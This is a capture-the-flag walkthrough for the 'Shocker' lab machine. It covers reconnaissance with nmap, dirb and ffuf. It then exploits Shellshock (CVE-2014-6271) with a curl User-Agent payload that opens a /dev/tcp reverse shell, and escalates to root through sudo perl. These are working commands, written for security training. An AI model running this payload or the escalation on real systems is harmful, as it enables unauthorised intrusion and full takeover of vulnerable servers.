Explore the fundamentals of cybersecurity in the Shocker Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.10.56 shocker.htb

Script to add hosts automatically

ip="10.10.10.56"
domain="shocker.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV shocker.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-27 21:03 CEST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2014-6271 (Shellshock)

Directory Bruteforcing with dirb

First, run dirb to scan for directories on the target:

dirb http://shocker.htb/

You will find the cgi-bin directory.

Fuzzing for Shellshock Vulnerable Scripts

Use ffuf to fuzz for potential vulnerable .sh scripts inside the cgi-bin directory:

ffuf -u http://shocker.htb/cgi-bin/FUZZ.sh -c -w /usr/share/dirb/wordlists/small.txt

Exploiting CVE-2014-6271 (Shellshock)

Set up a listener to catch the reverse shell:

nc -lvnp 9001

Then, use curl to exploit the Shellshock vulnerability by sending a malicious User-Agent header:

Replace <vpn-ip> with your actual VPN IP to receive the connection.

curl -H "User-Agent: () { :;}; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/<vpn-ip>/9001 0>&1'" http://shocker.htb/cgi-bin/user.sh

Accessing the Target System

Once you recive the reverse shell, you can access files like:

cat /home/shelly/user.txt

Escalating Privileges with Sudo

Check for sudo permissions:

sudo -l

If you see the following entry:

(root) NOPASSWD: /usr/bin/perl

You can escalate privileges by running:

sudo perl -e 'exec "/bin/bash";'

This will give you a root shell.

cat /root/root.txt